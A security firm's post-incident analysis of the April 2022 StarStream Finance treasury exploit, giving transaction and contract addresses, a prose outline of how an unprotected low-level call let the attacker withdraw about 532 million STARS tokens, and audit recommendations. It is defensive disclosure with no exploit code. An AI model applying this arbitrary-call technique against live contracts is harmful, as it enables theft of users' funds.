April 08, 2022

Beosin: Analysis of the Attack on StarStream



On April 8, 2022, according to Beosin-Alert, StarStream Finance’s DistributorTreasury contract was exploited for 532M $STARS, then 900ETH was swapped out by the hacker. Beosin security team analyzed the incident and the results are as follows:


StarStream Introduction


Starstream is a suite of products that provides revenue aggregation, revenue generation and one-click smart contracts on Metis L2 rollup. The protocol is maintained by various devs and managed by STARS holders.



Related Information


● Transaction hash:


0xb1795ca2e77954007af14d89814c83b2d4f05d1834948f304fd9d731db875435


● Exploiter’s address:


0xffd90c77eaba8c9f24580a2e0088c0c940ac9c48


● Contract that launched the attack:


0x75381c1f12733fff9976525db747ef525646677d


● Attacked contract:


0x6f99b960450662d67bA7DCf78ac959dBF9050725


Attack Process


1.The project party (0x000007-d653cd) created StarstreamTreasury (0x1075da-0c90e9) and DistributorTreasury (0x6f99b9- 050725) contracts and transfered the ownership of the StarstreamTreasury contract to DistributorTreasury.


2. The attacker exploited the unsafe low-level call in the execute function of the DistributorTreasury contract to perform external function execution. This allowed the attacker to use this to call withdrawTokens in the StarstreamTreasury contract to withdraw a total of 532,571,155.859 $STARS from the contract.




Vulnerability Analysis


The root cause of this vulnerability is that the DistributorTreasury contract has an insecure low-level call which can be utilized by an attacker to perform arbitrary function execution.


Fund Tracing


The current flow of funds is shown below:



Summary


In response to this incident, the Beosin security team recommends:


1. Smart contracts devs should pay attention to permission control when designing and implementing key operations;


2. Before the project goes live, it is highly recommended to conduct a professional contract security audit to avoid security risks.


Beosin can provide professional security audit services. For more details, please visit our official website or contact us via Twitter, Discord or Telegram, etc.


Beosin can provide professional security audit services. For more details, please visit our official website or contact us via Twitter, Discord or Telegram, etc.


If you have need any blockchain security services, please contact us:


Website Email Official Twitter Alert Telegram LinkedIn

Related Project

Related Project Secure Score

Guess you like
Learn More
  • Beosin: Analysis of the Attack on Gymdefi

    April 10, 2022

  • Beosin: 10 Ways to Teach You How to Guard the NFT Assets

    April 08, 2022

  • The Analysis of Inverse Finance’s Price Manipulation Attack: The Hacker Profited About $15M

    April 03, 2022

  • Beosin’s Recommendation for Tracing Jay Chou’s Stolen NFT Worth Over $1M

    April 02, 2022

Join the community to discuss.